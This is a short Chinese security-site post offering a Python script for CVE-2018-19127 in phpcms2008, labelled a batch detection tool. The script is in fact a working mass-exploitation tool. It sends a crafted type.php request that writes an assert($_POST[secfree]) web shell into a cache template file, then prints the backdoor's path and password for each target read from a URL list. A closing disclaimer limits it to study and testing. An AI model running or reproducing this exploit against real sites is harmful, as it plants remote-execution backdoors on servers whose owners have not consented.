CVE-2018-19127 批量安全检测工具

安全工具 0 2754
指尖安全-小胖
指尖安全-小胖 2018年12月02日

概述: 

近日phpcms2008版本被爆出可控的缓存文件写入任意内容漏洞,该漏洞由type.php产生

原文连接:https://www.secfree.com/article-1113.html

批量检测工具

微信图片_20181202185900微信图片_20181202185904


#!/usr/bin/env python
# -*- coding: utf-8 -*- 
# CVE ID: CVE-2018-19127
# GetShell Tools author: Bearcat
# Referer: http://www.secfree.com/article-1113.html
import requests
import re
import sys

def send_payload(target):
	payload = "/type.php?template=tag_(){};@unlink(FILE);assert($_POST[secfree]);{//../rss"
	targets = target + payload

	header_list = {
		'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
	}

	try:
		request = requests.get(target)
		if request.status_code == 404:
			print "[-] 404 not found " + target
		else:
			results = requests.get(targets,headers=header_list,timeout=3).text
			# print results
			c = re.findall(r"function.assert'>(.+?)</a>",results)
			# print c
			if len(c):
				if c[0] == "function.assert":
					print "[+] exists " + "[WebShell:" + target + "/data/cache_template/rss.tpl.php|secfree]"
			else:
				print "[-] don't exists " + target
	except requests.ConnectionError:
		print "[-] Cannot connect url " + target

def read_url_list(files):
	for line in open(files):
		send_payload(line[:-1])

if __name__ == '__main__':
	print "\n[*] Start GetShell...\n"
	if sys.argv[1] == "-u":
		send_payload(sys.argv[2])
	elif sys.argv[1] == "-f":
		file = sys.argv[2]
		read_url_list(file)

仅供学习以及安全检测,请勿用作非法用途,如违反,指尖安全不承担任何责任!